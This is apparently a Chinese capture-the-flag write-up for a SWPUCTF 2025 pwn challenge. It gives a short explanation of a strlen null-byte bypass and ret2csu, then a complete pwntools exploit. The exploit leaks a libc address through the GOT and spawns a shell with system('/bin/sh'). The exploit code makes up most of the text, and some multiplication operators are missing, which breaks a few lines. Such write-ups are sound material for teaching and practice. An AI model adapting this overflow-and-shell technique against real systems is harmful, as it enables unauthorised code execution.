Problem: [SWPUCTF 2025 秋季新生赛]__libc_csu_init()
思路
- strlen会被\x00截断,在buf的里加入\x00即可,之后在填充8个字节,到达retn,之后就是正常ret2csu的做法,题目有rdi直接用即可
EXP
- from pwn import *
p=remote('node6.anna.nssctf.cn',26916)
a=ELF('./bug')
libc=ELF('./libc.so.6')
csu1=0x400890
csu2=0x4008A6
rdi=0x00000000004008b3
got=0x601018
main=a.symbols['main']
def csu(r12,r15):
pd=b'a'(0x50-1)+b'\x00'+b'a'(0x8)+p64(csu2)
pd+=p64(0)
pd+=p64(0)
pd+=p64(1)
pd+=p64(r12)
pd+=p64(0)
pd+=p64(0)
pd+=p64(r15)
pd+=p64(csu1)
pd+=b'a'(0x38)
pd+=p64(main)
p.send(pd)
sleep(1)
csu(got,got)
add=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
base=add-libc.sym['puts']
system=base+libc.sym['system']
binsh=base+next(libc.search(b'/bin/sh\x00'))
payload=b'a'(0x50-1)+b'\x00'+b'a'*(0x8)+p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()
总结
